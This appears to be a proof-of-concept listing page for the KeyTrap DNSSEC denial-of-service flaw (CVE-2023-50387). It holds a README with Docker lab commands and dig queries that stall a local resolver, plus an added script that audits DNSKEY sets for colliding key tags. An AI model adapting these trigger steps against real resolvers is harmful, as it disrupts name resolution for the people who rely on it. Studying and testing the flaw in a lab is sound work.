Related vulnerability
Title:
Microsoft DNS Server security vulnerability
(CVE-2023-50387)
Description: Microsoft DNS Server is a service from Microsoft, a US company. Microsoft DNS Server has a security vulnerability. The following products and versions are affected: Windows Server 2019, Windows Server 2019 (Server Core installation), Windows Server 2022, Windows Server 2022 (Server Core installation), Windows Server 2022, 23H2 Edition (Se
Description
KeyTrap (DNS)
Introduction
# CVE-2023-50387
KeyTrap in DNS (CVE-2023-50387)
This repository is for educational purposes.
The number of keys and signatures has been intentionally kept low to prevent their use in actual attacks, and a script for generating colliding keys is not included.
## Test

### Setting up the PoC environment
```sh
$ docker compose up --build
```
### Confirming DNSSEC works
```sh
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test
; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test. IN A
;; ANSWER SECTION:
a.a.test. 86400 IN A 10.10.0.4
;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE rcvd: 53
```
### Triggering KeyTrap
```sh
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```
```sh
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```
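KeyTrap works because a validator tries every DNSKEY whose key tag matches an RRSIG against that signature, so a zone whose DNSKEY RRset contains many keys with the same key tag multiplies validation work. The following audit script is an added example, not part of this repository: it computes RFC 4034 Appendix B key tags for a DNSKEY RRset in presentation format (such as the records in a signed zone file) and reports tags shared by more than one key, the condition patched resolvers now limit. The sample records are constructed with tiny fake public keys and are not the repository's zone data.

```python
"""Audit a DNSKEY RRset for the KeyTrap precondition: keys sharing one key tag."""
import base64
from collections import Counter


def key_tag(flags: int, protocol: int, algorithm: int, pubkey: bytes) -> int:
    """RFC 4034 Appendix B key tag over the DNSKEY RDATA (general case, not algorithm 1)."""
    rdata = flags.to_bytes(2, "big") + bytes([protocol, algorithm]) + pubkey
    ac = 0
    for i, b in enumerate(rdata):
        ac += b if i & 1 else b << 8   # odd bytes added as-is, even bytes shifted
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


def parse_dnskey(rr: str):
    """Parse 'owner TTL IN DNSKEY flags proto alg base64...' presentation format."""
    fields = rr.split()
    idx = fields.index("DNSKEY")
    flags, proto, alg = (int(x) for x in fields[idx + 1 : idx + 4])
    pubkey = base64.b64decode("".join(fields[idx + 4 :]))   # base64 may be split by spaces
    return flags, proto, alg, pubkey


def colliding_tags(rrset: list[str], max_per_tag: int = 1) -> dict[int, int]:
    """Return {key_tag: count} for every tag used by more than max_per_tag keys."""
    counts = Counter(key_tag(*parse_dnskey(rr)) for rr in rrset)
    return {tag: n for tag, n in counts.items() if n > max_per_tag}


# Constructed sample (not real keys): the two ZSKs share key tag 1038, the KSK differs.
SAMPLE_DNSKEYS = [
    "a.test. 86400 IN DNSKEY 256 3 13 AAEAAA==",
    "a.test. 86400 IN DNSKEY 256 3 13 AAAAAQ==",
    "a.test. 86400 IN DNSKEY 257 3 13 AAEAAA==",
]

if __name__ == "__main__":
    for tag, n in colliding_tags(SAMPLE_DNSKEYS).items():
        print(f"key tag {tag} is shared by {n} DNSKEY records")
```

Run it over the DNSKEY lines of a signed zone (for example `grep DNSKEY a.test.zone.signed`) to see how many keys a validator would have to try per signature.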
## References
- https://www.athene-center.de/en/keytrap
File snapshot
[4.0K] /data/pocs/04647e6ce060f27791aa9c4cceb3be59b91cf4b8
├── [4.0K] attacker
│ └── [ 55] Dockerfile
├── [4.0K] auth
│ ├── [2.4K] a.test.zone
│ ├── [8.6K] a.test.zone.signed
│ ├── [1.8K] Dockerfile
│ ├── [ 372] ksk.key
│ ├── [ 207] ksk.private
│ ├── [ 37] named
│ ├── [ 820] named.conf
│ ├── [ 372] zsk.key
│ └── [ 207] zsk.private
├── [ 750] docker-compose.yml
├── [4.0K] imgs
│ └── [ 40K] network.png
├── [1.0K] LICENSE
├── [ 15K] poetry.lock
├── [ 327] pyproject.toml
├── [1.8K] README.md
├── [4.0K] resolver
│ ├── [ 443] a.test.key
│ ├── [ 607] Dockerfile
│ └── [ 478] unbound.conf
└── [1.7K] rrsig.py
4 directories, 20 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.